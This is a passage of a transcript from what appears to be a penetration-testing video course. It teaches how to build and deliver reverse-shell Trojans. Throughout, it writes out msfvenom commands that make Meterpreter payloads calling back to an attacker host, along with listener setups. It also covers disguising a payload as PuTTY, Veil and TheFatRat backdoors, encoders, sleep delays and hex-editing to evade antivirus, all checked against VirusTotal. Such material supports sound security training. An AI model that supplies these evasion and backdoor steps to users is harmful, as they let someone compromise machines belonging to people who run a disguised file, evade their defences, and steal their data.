the next video, we're going to see how we can attack targets that do not have any vulnerability. So we're going to see how we can generate our own payloads and how we can deliver them to the target machine. See you in the next video. Okay, it is time we see how we can gain access to the secured systems. In the previous few videos, we talked about and we attacked machines that had some vulnerability inside of them, whether it was the operating system vulnerability, an outdated software, or weak credentials. We managed to exploit them through those vulnerabilities and gain access to them. But now let's see what happens if our target doesn't have any known vulnerability. What now? Well, remember I told you that the process of attacking is rather the same in this case. We want to deliver the payload to the target and execute it. Just while the target had a vulnerability, we did this through an exploit, and through that vulnerability we managed to execute the payload ourselves. Now it becomes harder. We must deliver the payload to the target using some other method, and the target has to execute the payload themselves. That is the hard part. The way you deliver the payload is completely up to you, whether it is over an email or over some HTTP page, over an USB drive, it doesn't matter. What matters is that the payload ends up on their machine and they double click and run it. For now, let us focus on just creating the payload and running it to see if it works. For this, I will use Kali Linux machine to create the payload and I will execute it on my main Windows 10 machine. You can run our payloads on the Windows 10 machine that we installed in the previous section, or you can use any other Windows machine whatsoever. It doesn't even have to be a Windows 10. It is completely up to you. Just one thing that we must make sure is that Windows Defender and antivirus software are turned off. Why? Well, we're going to be creating a payload using MSF Venom tool from the Metasploit framework, and since many people use the exact same tool to create the exact same payloads as we will right now, those payloads are well known to every antivirus software and they will get detected quickly. However, for now our goal is not to bypass antiviruses but to just create a payload and get it to work. So turn off your Windows Defender, and I will do it right here as well. You can go to this arrow, click on the Windows Defender, and the one thing that we want to turn off is under this virus and threat protection. We want to go to the manage settings and turn off the real-time protection. it will ask you for the administrator password, and once you type it in, it will turn off the real-time protection, as it says right here. So I will close this, and now let's create our very first Trojan. As I already said, for this we will be using a tool called MSF Venom, so I will open a terminal right here. Why we are using MSF Venom? Well, it is a known tool and it is used to generate payloads really fast. In just one command, we will be able to generate a program that will gain us an access to the target system. So let us see how we can create a simple one first. If I type the command msf venom-h, right here we're going to see our available options with the MSF Venom. And up here we also get examples of usage which tells us how we can generate a simple payload right here. Let's follow the example and try it out. Now it tells us right here that to run the MSF Venom we need to specify the entire path right here. But instead we can just specify MSF Venom. It will still recognize it as the tool that we need, and we can write our options right after it. So let me clear the screen so we can see the command better. And if I go and type MSF Venom, we want to use the -p option, and this -p option stands for payload. So here we specify which type of payload are we creating. In my case, since I'm going to be attacking this Windows 10 64-bit machine, I want to generate a Windows/x64/meterpreter/reverse TCP payload. I'm using a 64-bit because my machine is a 64-bit machine, and I'm using a reverse shell connection. Another option that we must specify is the lhost, and lhost is the IP address of your Cal Linux machine. So 192.168.1.12. In my case, I will just double check it, so sudo ifconfig test1234 is my password, and here it is, the IP address is correct. Great. Another option that we must specify is the local port, and by the way this lhost stands for localhost, not sure if I mentioned it, and the local port is the port that the target will connect to. In our case we can set that to be any port that we want, for example let's use 5555. After that we can use the -f option to specify the file type that we want to create. So since we are attacking a Windows machine in this video, I'm going to be creating an exe file. So I will just type -f and then exe, and the last option that I want to specify is -o. And this -o stands for output. Here we specify the name of the file. I will just call it shell.exe. This is all we will specify for now. So once again, we are creating a 64-bit payload for the Windows target. We set the local host, which will be written inside the payload, so the target can connect to our Cal Linux machine. And we also specify local port to which the target will connect to. After that, we mentioned that the file type will be .exe, which is an executable for Windows. And at the end, we output all of this with the name of shell.exe. Let's press enter. And here it is. Our payload is right here on our Cal Linux desktop. Here we can see it, shell.exe. This program, once executed on the target machine, will grant us an access and give us the meterpreter shell on that machine. Let's move it real quick to the target machine, and this is something that you can do however you want. You can plug in the USB device by going in Cal Linux, then on the devices, then USB, and select the USB device right here. Then you will transfer it to the USB device, and from the USB device you will transfer it to your target Windows machine. Or you can also go to the devices, click on drag and drop, and set to bidirectional. This simply means that you can just copy the file from the Cal Linux desktop and paste it or just drag it to the Windows 10 desktop, in my case. In case you're using another virtual machine that you're attacking, you can just copy it first to your main machine desktop, and then from the main machine desktop, copy it to the desktop of your virtual machine. Just make sure that in the target virtual machine, you also set the drag and drop to bidirectional. Great, now we got our shell.exe or our payload on the target machine. Great, but we're not done yet. Remember that this shell will attempt to connect to our Kali Linux machine once executed, since it is a reverse shell, and it will connect on the port 5555. In order for connection to be established, we must be listening on that port and have it open in order for target to even be able to connect back to us. This is something Metasploit Framework manually configured for us once we performed our exploitation of a vulnerability, but right now we must do it manually. And we can do it with the help of MSF console as well. So what I'm going to do is I'm going to start the MSF console. And once it opens up, I want to type use exploit multi and then handler. And this is not an actual exploit. You can imagine this as something that will listen for the incoming connection from our payload. It is also called a listener. So let's set it up. If I clear the screen to see it better and type show options, there is only one thing that we need to set, and that is the payload. So the payload in this bracket must match the payload that the target will execute. So let's change set payload to Windows x64 Meterpreter and then reverse TCP. Show options once again. And we must set the lhost and lport to match from the MSF Venom command. So set lhost to be the IP address of my Kali Linux machine, which is .1.12, and set the lport to be 5555. Once we set up all of these settings, we can run it. So I will just type run. We can see it is now listening for the connections and nothing else is really happening right here. Why? Well, because the shell on the target system hasn't been ran yet. So let's run it on Windows machine. Double click. And you will see nothing is opening, but if I go back to my Kali Linux machine, here it is. Here is our Meterpreter session opened. And it is identical to the ones that we had during our vulnerability exploitation section. Just this time, we created and delivered it manually, and we also manually set up our listener. Keep in mind that this didn't exploit any vulnerability. We are just relying on the mistake from the other person that is using target machine to execute our file. Otherwise, if the file doesn't get executed, we don't get access to their machine. And another thing to keep in mind is that listener, or in our case this multi-handler that we have, must be ran before the payload or before this shell.exe, which is kinda logical, since if the target runs our file and we weren't listening for the connection, then they won't be able to connect to our machine. You can also notice on target's desktop once again, nothing is really happening, so they might think that the program they executed didn't work and they won't question it that much. But of course we got the connection right here and we can use all of the commands that the Meterpreter gives us. We can, as usual, enter a shell, type whoami, type ipconfig, and all the other commands that we can execute. Type dir to check out all of the available files on the desktop. And if I exit this, exit out of the Meterpreter shell, since we successfully gained access to it once again. But keep in mind that, of course, this was just a basic example, and we will see in the next few videos how to create a little bit more complex payloads. See you in the next video. Welcome back. Let's get back to our payload creation. So, in the previous video, we saw how we can create a simple .exe Trojan using MSF Venom. We used the basic options, where we only set localhost and local port. Now let's check out some other options that we have available. If I go and open up my terminal and run the command msf venom -h, we will get our help menu. And the purpose of all of these other options that we can see right here will usually be to either bypass an antivirus or to make your payload smaller in size or something similar to that. Basically, it is used for creating a payload for your own needs. For example, in the previous video, we created a payload that was a Windows Meterpreter shell as an exe file. But we can create other file types if we want. To check out what other file types can we create, we can run the command msf venom --list formats. And it tells us that right here under the -f command. We can use --list formats to list all of the available formats. So let's do that real quick. --list and then formats. This will take a few seconds to execute, and seeing this will be really useful. Why? Well, imagine you were sending a payload to a Linux machine. An exe file wouldn't be much useful then, right? However, a Python file could be of use in that case. Well, MSF Venom allows us to create any file type that we want. So let's check out all of the available file types. So up here, we can see we can create ASP, DLL, exe, some other file types as well. We can go down here, we can see different programming languages such as C, C#. We can create in Perl, in PowerShell, in Python. We can also do Ruby, SH, and many other file formats if we want. And what I also want to show you besides this is different options that are also useful, whether it is for bypassing antivirus or changing the size of your payload. Let us check them out. So let's create a couple of payloads right now and compare them. Let me clear the screen first. And to compare them, we're going to use a site called VirusTotal. And to do that, and to visit the site, we must open the Firefox. And what VirusTotal is a website where you upload your viruses and they will tell you how many antivirus vendors are able to detect it as a malicious program. So if I open VirusTotal by typing VirusTotal right here, go to the first link, which is this one, virustotal.com. And one thing to keep in mind is that every file you upload to this website is sent to the antivirus vendors. So something that might be undetectable today, after uploading it to this website, it will for sure become detectable in a few days or a week. Are there other websites that don't send your files to antivirus vendors? Yes, but they are not as good as VirusTotal. And we already know that undetectable virus is a game of cat and mouse. Today it's undetectable, tomorrow it isn't. So this isn't really something to worry about right now. Let's create two payloads real fast. So the first one that we are going to create is going to be the one from the previous video. So let's do it real fast. We already know how to do that. It will be a 64-bit payload, meterpreter, reverse, TCP. lhost will be equal to the IP address, so let's check it out real quick. .1.12, and if I specify it right here, L port can be 5555, it doesn't really matter. The format will be exe, and the output we can save it as shell1.exe. Press enter. And as soon as this finishes, we're going to upload this payload to the VirusTotal to see how many antiviruses detect it as a malicious program. So it has finished. Let us go to the VirusTotal website, click on choose a file, navigate to the desktop directory and select shell1.exe. I will double click it, I will confirm the upload and it will upload the shell for me. Now this scan will take a minute or two. So while that is doing, what we can do is we can create our second payload, and to create the second payload we're going to use some additional options. So I will clear the screen right here and I will type MSF Venom-H right here so we have the help menu available. Then I will go right here and run the command MSF Venom. We will use the same payload, which is Windows x64 meterpreter / reverse TCP. We will select the local host 192.168.1.12. Local port will be 5555. After this we can use the -A option to select the payload architecture. As we can see right here, -A stands for the architecture to use for the payload. So let's go and select x64 because in my case I'm attacking a Windows 10 64-bit machine. If your Windows machine is 32-bit, you can proceed with x86. Okay? The next thing that we're going to use is a very interesting thing, and that is an encoder. And what is an encoder? Well, let's go right here and find the -E option, which says right here the encoder, and what we need to specify after it is the encoder that we want to use. Encoders can help us bypass some of the antiviruses. To list all of the encoders that we have, we can use -- list encoders. So let's do that first. So MSF Venom -- list and then encoders. And here they are. We get a bunch of encoders for x86 or for 32-bit architecture. We get some for the x64 or 64-bit architecture, and we get some other encoders up here as well. Now the ones that we're interested in at the moment are these x64 ones. So we're going to go with this one, x64/Zuto_Dekiru. So let's copy its name right here and paste it after the -e. Now if we go back to the help menu and go back to the encoder, another option that is closely linked to the encoder is this -i option. And it is the amount of iterations. As it says in the description, this is the number of times to encode the payload. So if I go right here, after selecting the encoder, we want to select -i to specify the number of iterations that we want to encode our payload. Now, the more iterations, the bigger the payload will be in size, but it also might mean that it will be less detectable to the antivirus vendors. So let's specify -i and then let's perform 15 iterations, for example. After it, we're going to specify the platform on which the payload will run, which is Windows. And after it, we're going to use the -n option and select 500. Now to see what this -n option is, we can go right here, and in the -n, we can see it is a NOP sled. It will prepend a NOP sled of length size onto the payload. Remember what a NOP is? A NOP is an instruction for the processor to not do anything. And here we are simply just telling how many NOPs we want to add to our payload. Once we select a bunch of these options, we can add at the end -f to be an exe and -o to be shell2.exe. So this is our second shell. Let's run it and wait for MSF Venom to create our payload. And while it is creating the payload, let's go to the VirusTotal and see how many detections we got with the regular Meterpreter shell. So of 68 antiviruses, 43 detected this as a malicious program. And here we can see which ones detected it as a malicious program and which ones didn't. Let's see whether we get any better result using the second shell. So we can see right here, it has been created, successfully added NOP sled of size 500 from x64 simple. The final size of the exe file is 8000 bytes. So let's go to VirusTotal and remember this number, 43 out of 68, and let's see whether we can at least bypass a little bit more antiviruses than from this first scan. Let's select the shell2.exe, confirm the upload. Now, while this is scanning, let me tell you something real quick. With the MSF options, don't expect to get much better results once applying some additional options or something like that. As I already mentioned, the MSF Venom is a really known tool, and everyone uses these options to generate payloads, so they are very well known to all the antivirus vendors. Here we can see our second shell is scanning, and let's see whether we get a lower number than 43. And here it is, the scan has finished. Right now we get a number of 38 out of 67. So we successfully managed to bypass 5 additional antivirus softwares using the additional commands that we added to our MSF Venom payload. However, let's try to make it even less than this, just by using the MSF Venom. There is another option that we can do, which is -x. And if I go to the help menu right here, we can see that -x stands for template. X allows us to use another program as its template. In other words, this means we can make our payload look similar to that other program. Now, this sometimes knows not to work, but let's give it a try and see whether we manage to bypass more antiviruses with this. For this, we can use any program that we want. I'm going to go with the program called PuTTY. So I'm going to go right here and type PuTTY. You can use any other executable file that you want. And under the download PuTTY, I will click on that link. It tells me you can download PuTTY here. I will click on here. And if I go all the way down, I'm searching for the executable file, so .exe, and here it is, 64-bit putty.exe. I will click on this, and I will save it in my downloads folder. Great, I will click on OK, and if I go right here, open the downloads folder, here I will have the putty executable. And just in case you don't know, on Windows, putty executable looks like this. So it has this icon and it is called putty.exe. Remember how it looks? Let me just delete it real quick, and I will open terminal in my downloads folder and run the command msfvenom-p. I will use the 64-bit meterpreter _ reverse TCP. L host will be 192.168.1.12. L port will be equal to 5555, and I will only add the -x option and select the program of putty.exe. Now if you're using some other executable, here you specify the name of the other executable. Just make sure that you are located in the same directory where that executable file is in order to run this command. After that, I can specify that it is format of exe, and output will be capital putty.exe. Press enter. So the creation of the payload has finished, and if I go and show you how the payload looks like on the Windows machine, let me just find this, and if I go and copy the putty with the capital P to my desktop, here we can see it looks exactly the same as the previous file that I showed you. Just in this case, this is our meterpreter shell. Let me show you real quick. If I go and open MSF console and I set up the multi-handle listener, so multi-handler, set payload to be Windows x64 meterpreter / reverse _ TCP, set lhost to be 192.168.1.12, and set lport to be 5555. I type run here, and then I run this putty.exe, go back to my Cal Linux, and we will have the meterpreter session 1 opened. Get user ID will tell me the time this Windows 10 machine. Okay, great, but this is out of the scope for this video. Let us check out what detection rate does this newly generated payload have. So let's go right here, choose file, navigate to downloads, because there is where our putty.exe is, select the payload, and confirm upload. And let's see if we generate a payload with a template, do we manage to bypass more antiviruses than with the previous two payloads? And it seems that we do. In the previous one we had 38 out of 67, right now we have 29 out of 69. So we managed to bypass additional 8 antivirus vendors. Great, this looks better than the last two. I'm going to Control-C this or just close this, and of course if you wanted to generate a fully undetectable payload with MSFvenom, you can always change the file format, but that comes with other problems. Let me show you real quick. So if I go right here under the downloads, and let's say we wanted to generate a Windows payload, but not as an exe file, but as a Python file. We can run the command msfvenom-p Windows x64 meterpreter / reverse TCP. lhost equals 192.168.1.12, lport equals 5555. -f is something that we want to change, so it is no longer going to be exe, it is going to be a Python file. And we output it with -o as a Python _ payload.py. Press enter, and this will create the Windows meterpreter payload just as a Python file. Here it is done, and if we go to VirusTotal, upload the Python payload right here, confirm the upload, and we can see no antivirus is able to detect it as a malicious program. It is FUD, or in other words, it is fully undetectable payload. However, how are you going to run it on the target machine? Windows machines don't have Python installed by default like Linux machines do. So this payload would only be useful if the target machine has Python installed. Otherwise it is completely useless as it cannot run without Python. Okay, great. We covered MSFvenom and some of its commands. I advise you to experiment even more with the MSF Venom, and for example, you can start creating other payloads if you want. We only created Windows payloads, but if you have a Linux machine or a Mac OS machine that you want to attack, you can generate payloads for those operating systems as well. To check out all the available payloads that you can create, you can type the command right here, MSF Venom -- list and then payloads. And here we can see a lot of different ones. We can go up here are only Windows payloads, but if we scroll all the way up, here are Solaris payloads, Ruby payloads, and these are just some programming languages. But here, if we scroll all the way up, we get to the OS X payloads. So you can attack OS X operating systems. If we go even more up, here are Linux operating systems and Linux Meterpreter reverse TCP payloads. We also get the bind shell payloads. We get up here the Linux payloads for the 64-bit systems as well. So you can attack any operating system that you want. Great. Now that we took a look at MSF Venom and we covered some of its options, let's also take a look at some other tools that we can use for payload creation. See you in the next video. Welcome back. And right now, we're going to check out another tool that is used for generating payloads. And that tool is called Whale. Since it is not installed in Kali Linux by default, we must install it first. To do that, you can open up your terminal, enter the root account by typing in your password after the sudo su, and then after it, you want to type the command apt-get install Whale. Now, since I already have Whale installed, this will not do anything for me. But for you, it should start the process of installing Whale, and that process might take some time. However, running this command is only the first part. After this installation finishes, you can clear the screen and type Whale inside of your root terminal. This will, for me, open up the Whale program, but for you, it will continue the process of installation. So Whale has a bunch of dependencies, and once you run the apt-get install Whale, and after it you run the Whale program for the first time, it will ask you to install those dependencies. You want to click there yes, and that process will also take some time. It will also have a bunch of pop-up windows right here, where you want to click on next on each one. You don't want to change any of those settings, and after all the installation has finished, you should have Whale up and running. Okay, great. After you get Whale up and running, we can see right here that we get two available tools. The first one is Vasion, and the second one is Ordnance. And what Whale is simply a program that will allow us to generate payloads similarly to the MSF Venom. So let's give it a try. If I type use1, and you will notice that the commands are similar to the MSF console. So to use one of these options, you can simply just type use1 or use2. And since I selected use evasion, as we can see number 1 is evasion, it will tell me 41 payloads loaded. And these are our available commands. So we can read information, we can list the payloads, we can use some payload. So let us list our payloads first. And here we can see those 41 payloads. Some of them are coded in Ruby, some of them are coded in Python. We have PowerShell payloads, Perl, Go, CES, C#, C payloads, and we get some auxiliary modules as well. Now, the regular payload that we used in the MSF Venom would most likely be this C Meterpreter reverse TCP.py. It is pretty much the same thing. But since we already covered something similar to this inside of the MSF Venom, let us go with a different payload this time. So let's go with a PowerShell payload. Let's select payload number 22, which is PowerShell Meterpreter reverse TCP. So we can just type use 22. And after you select the payload, it will give you all of the available options that you can set for that payload before you generate it and create it. Here we can see domain, hostname, lhost, local port, min browsers, min processes, min RAM, processors, sleep time, and these options you can use and change as you like. Some of them might actually help you bypass some of the antiviruses, such as for example this sleep option right here. Sleep this amount of seconds. So whatever we set right here, that amount of seconds our payload will sleep after execution before establishing the connection with our listener. So let's set that right away. Let's set sleep to be 20 seconds. What does this mean once again? Well, once the target executes our program, the program will sleep for 20 seconds, it will not do anything, and then after 20 seconds, it will establish the connection with our listener. Another thing that we must set is the local host, and for that, we must know our IP address. And it is .1.12, so I will go right here, type set lhost 192.168.1.12. And if I type generate, as we can see by the available commands right here, to generate the payload, we simply type generate. Press enter. Please enter the base name for the output files, and let's call it power payload, meaning a PowerShell payload. I will click here enter, and the payload has been created. We can see right here language, PowerShell, payload module is the one that we selected, source code is written to this path right here, and we will notice that it is written inside of the .bat file. And Metasploit resource file written to this location right here. And the two things that we're interested in are these two things: the Metasploit resource file and the source code. Now, this source code, which is .bat, is something that we want to convert to exe. Now, even though on Windows systems, .bat file is runnable, but this will get triggered by any antivirus program out there. Since it is just a basic code that executes commands, it will get triggered by any antivirus. We want to convert it to exe, and how are we going to do that? Well, we can go to Firefox, and there is a really good tool that is used to convert bat programs to exe files, and we're going to download it from GitHub. So, if I type right here, bat to exe or B2E GitHub, and I navigate right here to the first link, I copy the tool. We can see that tool is an actual zip file, so we must unzip it as soon as we download it. So let's go right here, go to the second terminal. Let's install the tool on our desktop, and I will type git clone and then paste the link to the tool. After the tool is installed, we can change the directory to that tool, and if I type ls, here is the bat to exe converter as a zip file. To unzip it, we can type the command unzip and then bat to exe, and it will unzip our file. Clear the screen, type ls, and we will get an exe file. Is this a problem? We know that exe files can only be run inside of Windows, but remember, we have a Wine program installed. Let's get a quick reminder of what Wine is. Wine is a program that allows us to execute Windows files inside of Linux. So let's give it a try. If I type Wine and then the program name, press enter, let's give it a few seconds, and here it is. It opened the program. So we must set up the program. I will set the language to be English, click on OK. I accept the agreement. Of course, we're not going to read all of this. Then click on next. Click once again on next. And click right here on next. After it, on the last step, we can click on install. We want to check right here launch bat to exe converter and click on finish. And here it is. It opened our bat to exe converter. So now what we want to do is this payload that we generated, which is inside of this location as a .bat file, we want to convert to exe using this program. So we must open it inside of this program first. To do that, we want to go onto File and then Open. Now we must go to this location right here. So let's click on this arrow. Let's go to the slash location, find var, then find lib. Then the next part is Whale, so we must go and find the Whale program. Here it is. And inside of the output and source is our power payload.bat. Let's double click it, and it will open the code of our payload. Here it is, right here. Now, we have some of the options right here that we can change if we want to. You can add an icon by checking this and then selecting the icon from your system, but we're not going to be doing that at the moment. Another thing that you can do, you can set the password, you can change the working directory, you can change the exe format to be something out of these 4 and I will select to be 64-bit Windows invisible because I am attacking a 64-bit Windows machine. You can request administrator privileges at the runtime, so this is sometimes good if you want your target to run the payload as an administrator, but keep in mind, once they double-click the program, if this was selected, then they will have to input the administrator password. So that is just another step before they actually execute the program. We're not going to be checking that right now. Another thing that you can do is this packer, you can enable the UPX compression. But enabling this will just trigger more and more antivirus softwares because UPX is a really known packer and it was used a lot to pack malicious programs. So there is nothing really here that we want to change. And once you set all of the settings to your liking, you can go right here on the converter and then on convert. Here you want to select the name of your payload and we can just call it PS payload, standing for PowerShell payload. It is an exe format, so we can just save it. And if I click on OK, it will create our exe file, as we can see down here. Process finished. Here we can see where our file has been saved. It is in /var, libwhale output source, and then pspayload.exe. Okay, great. Now the next thing that we must do to check out whether this payload works is to run MSF console. And while it is running MSF console, what I'm going to do is I'm going to navigate to the Whale directory. So I will open folder, I will go to file system, then go right here to var, navigate to lib, all the way down I will go to Whale, then output, source, and here is our PowerShell payload.exe. Let us copy it to our target desktop. So I will just drag it onto the desktop of my target machine, and here is our PowerShell payload.exe. If I go right here, open the Metasploit framework, and I go back to the Whale first, copy this Metasploit resource file, copy its entire path, and type resource, and then paste this. What this is going to do is it will set up the listener automatically that is made for this exact payload. As we can see right here, it started reverse TCP handler on this IP address on this port, and it's doing all of that in the background. So all I'm left to do is execute this payload. Now, in this case, we can see the console of this payload, which is something that we don't really want. It only showed for a brief few seconds, but that is something that you can change inside of your PAT to exe converter. So let's wait for a few seconds, and in just a few seconds we should receive the Meterpreter session. And remember why it is taking so long is because inside of the Whale we set 20 seconds to wait before establishing connections, and here it is. We got the Meterpreter session 1 opened. Let's see whether we can execute commands. So if I clear the screen, type sessions, we have one session active, and I will enter it using the -i command, get user ID, and we are on that target machine. We can enter the shell as usual, type who am I, we are this account, and everything seems to work. Great. So we managed to create another type of payload that wasn't the same as in the previous video. And to just prove you that, I can go right here to the virus total, and we can upload the payload to see how many antiviruses managed to detect it. With a regular MSF1 payload, we got about 53 or 54 detection rate out of 60 antiviruses. Let's see how much we get right now. Let's go and find the payload, and it is once again in /var/lib/whale in the output folder and in the source folder. Here it is. I will select it, confirm the upload, and we should have a much lower detection rate than with the regular MSF1 payload. And once again, with the usage of this PAT to exe converter, you can change some of these settings and you might even get lower detection rate, but it will never be 0. Why? Well, if I just go right here and I delete the entire code and type some random code, which doesn't do pretty much anything, and if I were to convert this code to exe, it will still get detected by a lot of antivirus vendors. You might be asking why, since this right here is not any type of a malicious code. Well, that is because we're using this tool PAT to exe converter, and some antivirus vendors find files malicious even though they might not be, just because you converted the bad file to an exe. That is pretty much the only reason. And we can see right here, we get a much lower detection rate than with the regular MSF1 payload. We get 27 out of 67. So we managed to bypass about 20 to 30 more antiviruses just by creating a PowerShell payload with Whale instead of using a regular MSF1 payload. Great, so what did we learn in this video? Well, we covered this tool called Whale. You can experiment with other options as well, and you might get even lower detection rate. We also covered this bat2exe tool that we can use to convert the bat files to exe, and we also know that no matter what type of file we convert to exe, it will still get detected by some of the antiviruses just because we used a tool like this. Okay, great. Now that we covered this, we can proceed with our payloads in the next video. See you there. Welcome back. In this video, I want to talk about yet another tool that we can use for payload creation, and that tool is called the Fat Rat. I know, right? What a name. Anyway, this is a tool that we have available on GitHub, so let's go real quick and download it from the GitHub repository. If I type in the search bar Fat Rat GitHub, it should lead me to this first link where I want to click on, and once it opens this page, we want to copy the link to this tool and git clone it inside of our desktop directory. Now you will notice right here that I already have the tool downloaded, so I will not be cloning it right now. The good thing for this tool is that on the GitHub page, if I scroll down here, we have the commands for the exact installation of this tool. So first we git clone the tool itself, then we change directory to the tool folder, and we run this command right here. Since I already did all of this, you do this first, and then we can go and start the tool. Okay, did you do it? Let's go and start the Fat Rat tool. Now keep in mind, once starting this tool, you must enter the root terminal, and we do that as usual with sudo su command. Once I go there, I will navigate to the desktop and to the Fat Rat directory. If I type ls, we should see this file called Fat Rat, and that is the tool itself. So in order to run it, we can just type its name inside of the terminal. Press enter, and this will start the tool for us. You will notice that the tool is rather similar to all of the previous tools that we used for payload creation, so there is nothing really new here. We're just experimenting with different tools to see what type of payload is best for us. It will go right here through some of the dependencies, and if it doesn't have some of the files that it needs installed, it will automatically install it for you. For me, it already has all of this installed, so it will just prompt me with this warning that says, don't upload the backdoors created with the Fat Rat to the virustotal.com. So we're not going to do that. If the tool tells us to, we're not going to go and upload them to VirusTotal. Anyway, let's see how we can create them, so I will press enter to continue. Here it started the service PostgreSQL, and I will press continue once again. And here it is. This is the main menu. So we got quite a few options right here. We can create backdoor with MSF1. We can create fully undetectable backdoor with FUDWIN. We can create with other programs as well. So this is just a matter of choice. You can also, if you notice right here, create a backdoor of the APK file, which would be for mobile phones. Okay, great. Let us go with any one of these. Let's go, for example, with number 6, which is create fully undetectable backdoor with PWN wins. It says in the brackets excellent, but keep in mind that even though right here it says fully undetectable, it most likely won't be fully undetectable because this tool right here isn't that new. Nonetheless, let us go with number 6 as an option, and you can go with a different option if you prefer. I will just go with this one for the purposes of this tutorial, and here we have also a few different options. We can create backdoor with C, PowerShell, and embed PDF. We can create backdoor with C, Meterpreter reverse TCP. We can create exe file with C# and the PowerShell. It says it is fully undetectable 100%. So let's go with that one this time. I will select number 2. It will tell me right here my IPv4 local address, my IPv6 address, and my public IP address right here. So what I'm going to do is I'm going to set the localhost IP to be 192.168.1.12, and I will select the local port to be 5555. Press enter. Please enter the base name for output files. We can call this rat backdoor, just so we know from which program it is. Here it asks us to select which type of payload we want to create, and we are going to go with the good old Windows Meterpreter reverse TCP. So I will select number 3 right here, press enter, and this should create the backdoor for me. After a few seconds, we should have this output that says backdoor saved to this path right here, and up here we can see the code of our payload. It is inside of C#, and we can see it calls the system function, which execute a PowerShell command. Okay, great. So let's remember this location right here. Matter of fact, let's copy it, and now we can press enter. Now, you will notice that this tool doesn't set the listener automatically for us. So what we're going to do is you can either set up a listener based on the information that you specified for the payload inside a second terminal using MSF console, or we can go back to the menu using the number 9. And once it comes back to this menu, we can go and jump to MSF console straight from the fat rat with the number 10. Okay, great. While the MSF console is opening, what I'm going to do is I'm going to open another terminal where I'm going to enter the root terminal first and then navigate to the path that we copied. Okay, great. Type ls here and we should have ratbackdoor.exe. Let's copy it to our desktop. So home, Mr. Hacker, and then desktop. And from the desktop, if I go and lower all of these windows, we should be able to copy it straight to our Windows 10 machine. Okay, great. So it is on our target machine. Let's set the settings inside of the MSF console. Use exploit multi-handler. Set payload to be, remember, Windows Meterpreter reverse TCP. And we need to set the L host and the L port accordingly to what we set inside of our payload. So for me, it is 192.168.1.12. And the L port is 5555. Press run. And if we go and run our backdoor, it will execute, go back to our MSF console, and here is the Meterpreter shell. Once again, we can execute the commands that we want. If I type, for example, ps command, this will list all of the processes running on that target machine. So if I scroll all the way up, we should be able to find the ratbackdoor.exe file that we executed on the target machine. It should be somewhere here. And here it is. Here is the ratbackdoor.exe. This is our file running on the target system. Now we know how to create payloads. Now, there are other tools as well that we can use, but I will leave that for you to discover, since they all work pretty much the same. Great. In the next video, we're going to check out how we can make some changes on our payloads that will allow us to either bypass some of the antiviruses, or we're going to see what we can do to the payload to make our target have greater chance of executing it. See you in the next video. Welcome back. In this video, I want to talk about bypassing antivirus. And this video is not going to be that practical. You might be asking, why? Well, I could show you a way to bypass antivirus right here in this video, but chances are that will not work once you watch the video in a month or 2 months or in a year. A fully undetectable payload is not something that lasts forever, especially when I show it inside of something like a course that many people are going to watch. So instead, I would like to tell you about a few different techniques that you can apply to generate an undetectable payload. So how it all goes? Well, many people start using a payload, and sooner or later, antiviruses start detecting it as a malicious program. That could be due to people using it a lot, or it could be that some of you uploaded it to the VirusTotal and it got sent to all the antivirus vendors. However, let me talk about the rules that you can apply to bypass antivirus. Now, the best thing that you can do to create a fully undetectable payload is to code your own programs or your own payloads. For example, I coded a backdoor in C language, and when I scanned it, it was fully undetectable. No antivirus was able to flag it as a malicious program. Then I created a course on creating that backdoor, and soon enough, that backdoor was no longer fully undetectable and was getting caught by most antiviruses. It was FUD at first because it was a new payload with a new code or a new source code. Once you have a unique and different code and you compile it, that code becomes a different binary which makes it undetectable until many people start using it. So just remember, best way to create undetectable payload is to code it yourself in a unique way. However, this requires you to know a programming language, and for many, this will present a problem. There are other ways as well, so one of them is to update your payload tools if possible, and you also want to keep an eye for the tools that are new, or the tools that just came out. Why? Well, they might have different payloads that aren't widely used yet, so that is another way that you can do it. You can also try creating different types of payloads, try out PowerShell payloads, Python payloads, C# payloads. All of them have higher chances of not getting detected. Another cool thing you can do once you generate your payload is to change its binary a little bit. Let me show you what I mean. We can do this by using Hex Editor. So let us just real quick generate a normal Windows Meterpreter reverse TCP payload. Let us go with lhost, lport, and let's specify file to be exe and output to be shell.exe. Okay, great. This is a regular Meterpreter payload. It gets detected by almost every antivirus in the world. It is, matter of fact, the most known payload in the world for malicious activities. But what you can do, if I show you right here the MD5 sum hash of this payload, you will see it is this one. So some antiviruses work by getting the hash of the executable and storing it in their database. Then once you change this hash, and you change this hash by changing the binary of the program, this hash becomes different and it is no longer inside of the databases of antiviruses. Let me show you a simple way to change it. So what we can do is we can type Hex Editor, which is a tool that is already installed in Kali Linux, and we can specify the payload name. This will open the payload's binary. And here we want to change some of the binary. Just be careful, don't change something that you don't know what it is, because even changing a single byte right here could result in a program not working, if that byte was essential for the program to run. Now, there are a few things right here that we can change for sure, and that is this right here. This is a program that cannot be run in DOS mode. Now, what is this? Well, this is a string. It is nothing really too important for the program. So we can go navigate with our arrows, and we can change this string. As you can see, when I type hexadecimal right here, it changes the output inside of this right column. So if I just type some random hexadecimal numbers and letters to change this, and once you change some of it, this will change colors. And if I go all the way down, there is another thing that we can change, and that is this text right here. This is also something that we can change. Just make sure you navigate to the correct line. In my case, I believe it is this one. The text should start with 7.4, and we can change it to whatever we want. Just once again, make sure you don't go over that word, because changing, for example, this byte right here will result in a program to not work. Okay. Once you finish this, you can Ctrl-O, save this. Now if you remember how the MD5 hash started before we did this, if I do it again, it is completely different. I believe it started with something like 8.3 or I don't even remember, but right now it is completely different. We managed to change the hash of this executable by changing its binary, and this Even though for many antiviruses this is something that will not bypass them, even if you manage to bypass 2 or 3 additional antiviruses, that is good. You did a slight change. So this won't do much of a difference, but everything you can change, you should, since you gain higher chances of bypassing antivirus. As well as if you have, for example, the source code of a payload, what you can do is you can try to change it yourself a little bit. Just add some random functions, or make your program not do anything for first minute or 2 after running. All of these things can help you bypass antivirus. Okay, so these are just some of the ways that you can apply next time you create a payload. Just remember one thing. Whatever type of payload you create to be undetectable, it won't last long. So this is something you will have to experiment with over and over again. In the next video, we're going to see one of the ways we can mask our payload to look like a different program. See you there. Welcome back. In this video, I want to show you a cool way that you can make your executable seem and look like another file. So what I'm going to do right now is I'm going to mask our shell.exe that we created from the previous video to look like